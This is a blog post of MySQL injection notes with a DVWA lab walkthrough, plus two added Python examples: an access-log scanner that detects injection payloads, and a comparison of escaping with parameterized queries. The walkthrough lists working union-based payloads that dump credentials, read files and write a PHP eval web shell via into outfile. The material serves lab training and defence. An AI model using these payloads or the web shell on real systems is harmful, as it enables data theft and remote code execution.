[Summary] SQL Injection Vulnerability


Date: 2019-07-23 19:55:59
update:
Author: Bay0net
Description: Mysql injection notes


0x01. Basic information

Basic terms

  • Database: a database is a collection of related tables.
  • Table: a table is a matrix of data; in a database, a table looks like a simple spreadsheet.
  • Column: a column (data element) holds data of one type, such as a zip code.
  • Row: a row (tuple or record) is a group of related data, such as one user's subscription data.
  • Primary key: a primary key is unique. A table can have only one primary key, and it can be used to look up rows.
  • Foreign key: a foreign key links two tables.

Common Commands

# Log in (the password is requested at the prompt; note that "-p root" with a space would be read as the database name, not the password)
mysql -h 127.0.0.1 -u root -p

0x02. MySQL commands

Enumerating database names, table names and column names

Every MySQL instance has its own information_schema database, which stores the basic metadata about all the other databases in that instance.

# Dump the database names
select group_concat(SCHEMA_NAME) from information_schema.schemata;

# Dump the table names of the current database
select group_concat(table_name) from information_schema.tables where table_schema=database();

# Dump the column names (the table name is users; either quote it or hex-encode it)
select group_concat(column_name) from information_schema.columns where table_name='users';
select group_concat(column_name) from information_schema.columns where table_name=0x7573657273;

# Dump the column contents
select first_name,password from users;

Checking MySQL file read and write permissions

MySQL's file read and write functions can only be used with sufficient privileges.

The secure_file_priv parameter restricts load_file, into outfile and related functions to reading and writing within a specified directory.

# How to check
show global variables like '%secure%';

# Meaning of the values
When secure_file_priv is NULL, mysqld is not allowed to import or export files at all.
When secure_file_priv is /tmp/, mysqld may only import and export files under the /tmp/ directory.
When secure_file_priv is /, mysqld may import and export files anywhere on the disk it resides on.
When secure_file_priv has no value, mysqld's import and export are not restricted.

File Operations

# Read a file
select load_file('//tmp//key');

# Write a file (requires the privilege and knowledge of the absolute path)
select 'hello' into outfile '/tmp/test01';

Filtering functions

Before PHP 5.4 there was a magic_quotes_gpc configuration item; when magic_quotes was on, every single quote, double quote, backslash and NUL was automatically escaped with a backslash. From PHP 5.4 onward this method of escaping is no longer available.

mysql_real_escape_string() is also used to escape special characters, but this extension was deprecated in PHP 5.5 and removed in PHP 7.

PHP: mysqli::real_escape_string - Manual

0x03. SQL Injection (DVWA)

Low Security Level

# Check whether the parameter is injectable
?id=1' or '1'='1
?id=1' or '1'='2

# Determine the number of columns (2 is normal, 3 gives an error)
?id=1' order by 2 -- 
?id=1' order by 3 --

# Find which columns are echoed back
?id=1' union select 111,222 -- 

# User name and database name
?id=1' union select user(),database() -- 
-- output: admin@localhost, dvwa

# Current user and MySQL version
?id=1' union select current_user(),version() -- 
-- output: First name: admin@%, 5.5.47-0ubuntu0.14.04.1

# Dump the table names
?id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database() -- 
-- output: guestbook,users

# Dump the column names (two ways: quoted or hex-encoded)
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name =0x7573657273 -- 
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' -- 
-- output: user_id,first_name,last_name,user,password,avatar,last_login,failed_login

# Dump the column contents
?id=1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users  -- 
?id=1' union select null,concat_ws(char(32,58,32),user,password) from users -- 
?id=1' union select user,password from users -- 
-- output: admin/5f4dcc3b5aa765d61d8327deb882cf99

# Read a file
?id=1' union select 1,load_file('//tmp//key') -- 

# Write a file
?id=1' and '1'='2' union select null,'hello' into outfile '/tmp/test01' --
?id=999' union select null,'hello' into outfile '/tmp/test02' --
?id=999'  union select null,'<?php @eval($_POST["gg"]); ?>' into outfile '/tmp/test03' --  
?id=999' union select 1,0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E into outfile '//tmp//test04' -- 
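A defender-side complement to the payloads above, as an added example that is not part of the original post: a small Python scanner that URL-decodes the query string of each access-log line and flags the patterns this walkthrough uses (quote tautology, order by probing, union select, information_schema lookups, load_file, into outfile, long hex literals). The log lines are constructed samples in Combined Log Format; the rule names are my own.

```python
"""Flag the injection patterns from the walkthrough above in web server access
logs. Added example, not part of the original post; the log lines are
constructed samples in Combined Log Format."""
import re
from urllib.parse import unquote_plus, urlsplit
# Signatures drawn from the payloads above (case-insensitive).
SIGNATURES = {
    "tautology": re.compile(r"""['"]\s*or\s*['"]?\d+['"]?\s*=\s*['"]?\d+""", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{8,}\b", re.I),
}
# Combined Log Format: client ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def decode_query(path):
    """Fully URL-decode the query string (twice, to catch double encoding)."""
    return unquote_plus(unquote_plus(urlsplit(path).query))

def scan_line(line):
    """Return (client, [matched rule names]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, path, _status = m.groups()
    decoded = decode_query(path)
    return client, [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (line_no, client, rules) for every line matching at least one rule."""
    findings = []
    for no, line in enumerate(lines, 1):
        parsed = scan_line(line)
        if parsed and parsed[1]:
            findings.append((no, parsed[0], parsed[1]))
    return findings

# Constructed: one benign request followed by three carrying payloads from above.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jul/2019:19:55:59 +0800] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321',
    '10.0.0.9 - - [23/Jul/2019:19:56:10 +0800] "GET /vulnerabilities/sqli/?id=1%27+or+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4800',
    '10.0.0.9 - - [23/Jul/2019:19:56:31 +0800] "GET /vulnerabilities/sqli/?id=1%27+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema%3Ddatabase()+--+&Submit=Submit HTTP/1.1" 200 4900',
    '10.0.0.9 - - [23/Jul/2019:19:57:02 +0800] "GET /vulnerabilities/sqli/?id=999%27+union+select+1,0x3C3F706870+into+outfile+%27/tmp/test04%27+--+&Submit=Submit HTTP/1.1" 200 4400',
]

if __name__ == "__main__":
    for no, client, rules in scan_log(SAMPLE_LOG):
        print(f"line {no}: {client} -> {', '.join(rules)}")
```

Signature matching of this kind is a triage aid, not a WAF: it only catches the shapes shown on this page, so tune it on your own traffic.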

Medium Security Level

The mysqli_real_escape_string function is used to escape special characters, and the front end is a drop-down selection form intended to control the user's input.

This is a numeric-type injection, so the escaping of special characters makes little difference; simply submit the payload as a POST request with HackBar.

# Check the injection point
id=1 and 1=1 &Submit=Submit
id=1 and 1=2 &Submit=Submit

# Dump the data
id=1 union select user,password from users&Submit=Submit

High Security Level

Here a limit 1 clause has been added to restrict the output, but it can simply be commented out; the solution is the same as for the Low security level.

Impossible Security Level

PDO is used to separate code from data, which effectively prevents SQL injection. In addition, output is produced only when the query returns exactly one row, which effectively prevents bulk dumping of the database ("tuoku"), and an Anti-CSRF token mechanism has been added to improve security further.
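To make concrete why the Medium level's escaping fails against a numeric injection while the Impossible level's parameterized (PDO-style) query holds, here is an added Python example that is not DVWA's own code and also illustrates the filtering-function discussion above. It runs both query styles against an in-memory sqlite3 table standing in for MySQL; the escaping function is a simplified analogue of mysqli_real_escape_string (an assumption, not a drop-in replacement) and the rows are constructed sample data.

```python
"""Why escaping does not stop a numeric-type injection (Medium level) while a
parameterized query (the PDO approach of the Impossible level) does.
Added example, not DVWA's code; sqlite3 stands in for MySQL and the table
contents are constructed sample data."""
import sqlite3

def escape_like_real_escape_string(value):
    """Simplified analogue of mysqli_real_escape_string (assumption: it covers
    the characters relevant here; it is not a drop-in replacement)."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0", "\n": "\\n", "\r": "\\r"}
    return "".join(table.get(ch, ch) for ch in value)

def make_db():
    """In-memory users table mirroring the columns dumped above (sample rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(user_id INTEGER, first_name TEXT, user TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES (2, 'Gordon', 'gordonb', 'e99a18c4428cb38d5f260853678922e3');
    """)
    return db

def query_escaped(db, user_input):
    """Medium level: escape, then splice into an unquoted numeric comparison.
    A payload containing no quotes passes through escaping unchanged."""
    sql = ("SELECT first_name, password FROM users WHERE user_id = "
           + escape_like_real_escape_string(user_input))
    return db.execute(sql).fetchall()

def query_parameterized(db, user_input):
    """Impossible level: bind the value so the driver treats it as data, never
    as SQL, and return output only when exactly one row matches."""
    rows = db.execute(
        "SELECT first_name, password FROM users WHERE user_id = ?", (user_input,)
    ).fetchall()
    return rows if len(rows) == 1 else []

if __name__ == "__main__":
    db = make_db()
    payload = "1 union select user, password from users"  # same shape as the Medium payload
    print("escaped:      ", query_escaped(db, payload))        # every password leaks
    print("parameterized:", query_parameterized(db, payload))  # []
    print("parameterized:", query_parameterized(db, "1"))      # only admin's row
```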

DVWA SQL Injection clearance Tutorials | AnCoLin's Blog | wind shadow blog

Origin www.cnblogs.com/v1vvwv/p/SQL-Injection-Summary.html